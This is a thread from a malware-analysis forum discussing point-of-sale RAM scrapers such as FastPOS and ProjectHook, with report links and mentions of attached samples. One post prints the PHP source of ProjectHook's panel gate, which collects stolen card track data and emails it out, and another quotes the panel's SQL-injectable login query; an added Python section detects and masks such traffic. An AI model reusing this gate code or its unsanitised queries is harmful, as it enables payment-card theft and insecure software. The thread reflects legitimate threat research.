Point-of-Sale malwares / RAM scrapers

Forum for analysis and discussion about malware.

Re: Point-of-Sale malwares / RAM scrapers

Postby Xylitol » Wed Apr 20, 2016 12:17 pm


Re: Point-of-Sale malwares / RAM scrapers

Postby Silence_is_best » Thu Apr 21, 2016 7:23 pm

Thanks so much!

Re: Point-of-Sale malwares / RAM scrapers

Postby benkow_ » Thu May 19, 2016 8:21 am


Re: Point-of-Sale malwares / RAM scrapers

Postby xors » Fri Jun 03, 2016 11:03 am

FastPos

Read more about it here:

http://blog.trendmicro.com/trendlabs-se ... ard-theft/

and here

http://documents.trendmicro.com/assets/ ... -theft.pdf

Sample in the attachment

PDB Path: C:\Program Files\WinRAR\Formats\ETC\CPANEL + SURSA\sursa\The Hook\Release\The Hook.pdb

Re: Malware collection

Postby EP_X0FF » Sun Oct 16, 2016 7:21 am


Re: Point-of-Sale malwares / RAM scrapers

Postby benkow_ » Sun Oct 23, 2016 4:22 pm

ProjectHook RAM scraper seems to be alive (thx to xylitol).
I could not find any malware sample, but I attached the source code of the new panel.

new gate rxcx.php:
Code:

<?php
//$email = "XXXX@XXXX.XXX";
$email = "XXXX@XXXX.XX";
$headers  = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
$headers .= "From: dump@db.com\r\n";

include "db.php";

function getUserIP()
{
    $client  = @$_SERVER['HTTP_CLIENT_IP'];
    $forward = @$_SERVER['HTTP_X_FORWARDED_FOR'];
    $remote  = $_SERVER['REMOTE_ADDR'];

    if (filter_var($client, FILTER_VALIDATE_IP)) {
        $ip = $client;
    } elseif (filter_var($forward, FILTER_VALIDATE_IP)) {
        $ip = $forward;
    } else {
        $ip = $remote;
    }

    return $ip;
}

$user_ip = getUserIP();

// Initialize ExtendedAddslash() function for every $_POST variable
// (panel author's comment; no escaping is actually applied, the raw
//  POST values go straight into the queries below)

$byte   = $_POST['BYTE'];
$data   = $_POST['DATA'];
$id     = $_POST['ID'];
$proc   = $_POST['PROC'];
$track1 = $_POST['T1'];
$track2 = $_POST['T2'];

// search submission ID

$query       = "SELECT * FROM `hook` WHERE `submission_id` = '$id'";
$sqlsearch   = mysql_query($query);
$resultcount = mysql_numrows($sqlsearch);

if ($resultcount > 0) {
    mysql_query("UPDATE `hook` SET
                    `ip`   = '$user_ip',
                    `t1`   = '$track1',
                    `t2`   = '$track2',
                    `data` = '$data',
                    `proc` = '$proc',
                    `byte` = '$byte'
                 WHERE `submission_id` = '$id'")
        or die(mysql_error());
} else {
    mysql_query("INSERT INTO `hook` (ip, data, id, byte, proc, t1, t2)
                 VALUES ('$user_ip', '$data', '$id', '$byte', '$proc', '$track1', '$track2')")
        or die(mysql_error());
}

mail($email, "New Data: $user_ip $data $proc $track1 $track2", "ip: $user_ip<br>track1: $track1<br>track2: $track2<br>data: $data<br>proc: $proc", $headers);
?>
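As an added example (not from benkow_'s post or the panel itself), a defender-side parser in Python that recognizes a request shaped like the rxcx.php gate above (the BYTE/DATA/ID/PROC/T1/T2 field set) and reports any Luhn-valid PAN found in the T2 field, masked so the verdict carries no card data. The sample request, host name and track values are constructed test data; the ISO 7813 track 2 layout and the Luhn check are general knowledge, not something the post states.

```python
import re
from urllib.parse import parse_qs

# Constructed sample of a POST shaped like the rxcx.php gate expects it.
# Field names come from the posted gate source; host and values are made up,
# and the PAN is the well-known Visa test number, not a real card.
SAMPLE_POST = (
    "POST /rxcx.php HTTP/1.1\r\n"
    "Host: panel.example.invalid\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "BYTE=1024&DATA=pos01&ID=ab12&PROC=pos.exe&"
    "T1=%25B4111111111111111%5EDOE%2FJOHN%5E2512101%3F&"
    "T2=%3B4111111111111111%3D2512101%3F"
)

GATE_FIELDS = {"BYTE", "DATA", "ID", "PROC", "T1", "T2"}
# ISO 7813 track 2: ';' PAN '=' YYMM service-code discretionary-data '?'
TRACK2_RE = re.compile(r";(\d{13,19})=(\d{4})(\d{3})(\d*)\?")

def luhn_ok(pan: str) -> bool:
    """Luhn checksum, used to cut false positives on arbitrary digit runs."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

def mask_pan(pan: str) -> str:
    """Keep BIN and last four only, so the report itself holds no card data."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]

def inspect_post(raw: str) -> dict:
    """Flag a gate-shaped POST and list masked, Luhn-valid PANs in its T2 field."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line = head.split("\r\n", 1)[0]
    parts = request_line.split(" ")
    path = parts[1] if len(parts) > 1 else ""
    fields = {k: v[0] for k, v in parse_qs(body).items()}
    pans = [mask_pan(m.group(1)) for m in TRACK2_RE.finditer(fields.get("T2", ""))
            if luhn_ok(m.group(1))]
    return {"path": path, "gate_shape": GATE_FIELDS <= set(fields), "track2_pans": pans}
```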

Re: Point-of-Sale malwares / RAM scrapers

Postby p1nk » Mon Oct 24, 2016 1:39 am

Looks like they didn't learn to properly handle user input:

Code:
  // Create query
  $q = "SELECT * FROM `dbUsers` WHERE `username`='".$_POST["username"]."' AND `password`='".$_POST["password"]."' LIMIT 1";
  // Run query
  $r = mysql_query($q);

Re: Point-of-Sale malwares / RAM scrapers

Postby Bogdan-Mihai » Mon Oct 24, 2016 8:25 am

benkow_ wrote:ProjectHook RAM scraper seems to be alive (thx to xylitol)
I cannot found any malware sample but attached the source code of the new panel

Looks like the author or someone who edited the php files is Romanian - some strings from failed login indicate that.